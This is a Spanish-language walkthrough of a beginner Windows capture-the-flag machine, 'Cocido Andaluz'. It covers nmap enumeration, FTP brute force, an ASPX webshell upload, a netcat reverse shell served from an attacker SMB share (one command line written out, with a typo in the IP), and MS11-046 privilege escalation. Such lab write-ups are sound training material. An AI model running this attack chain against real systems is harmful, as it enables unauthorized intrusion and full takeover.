Resolución del CTF COCIDO ANDALUZ
❌Nombre: Cocido Andaluz
📈Nivel: PRINCIPIANTE
💻OS: Windows
🙋🏽♂️Creador: @CuriosidadesDeHackers & @condor7777
Enumeración
Escaneo de puertos
Realizamos un escaneo de todos los puertos para saber cuáles están activos.

Los parámetros utilizados son:
- -p- : Escaneo de todos los puertos. (65535)
- -sS : Realiza un TCP SYN Scan para escanear de manera rápida que puertos están abiertos.
- -sC : Realiz una escaneo con los scripts basicos de reconocimiento
- -sV : Realiza un escaneo en buqueda de los servicios
- –min-rate 5000: Especificamos que el escaneo de puertos no vaya más lento que 5000 paquetes por segundo, el parámetro anterior y este hacen que el escaneo se demore menos.
- -n: No realiza resolución de DNS, evitamos que el escaneo dure más tiempo del necesario.
- -Pn: Deshabilitamos el descubrimiento de host mediante ping.
En el puerto 80 nos encontramos un panel de apache por defecto, aunque es un IIS.

Hacemos fuerza bruta al servicio FTP y encontramos credenciales validas.

Entramos al servicio y desactivamos el modo pasivo, donde además cargamos una webshell en aspx.

Nos dirigimos a la ruta y vemos que podemos inyectar comandos.

Localizamos nc.exe en nuestro equipo y lo copiamos en nuestra recurso compartido, mediante un servidor de smb.

Abrimos el servidor en la ruta que queremos.

Y lo ejecutamos dándole la orden de que nos ejecute una cmd.

\\\192.168.18.19\share\nc.exe -e cmd.exe 192.168.18-19 443
Nos podemos en escucha y recibimos conexión.

Para detectar la vulnerabilidad usaremos Watson

Y como vemos es vulnerable a MS11-046.

Descargamos el exploit desde aqui y lo copiamos en nuestra carpeta de recursos compartidos de smb, de la misma manera lo ejecutamos y nos convertimos en usuario de máximos privilegios.
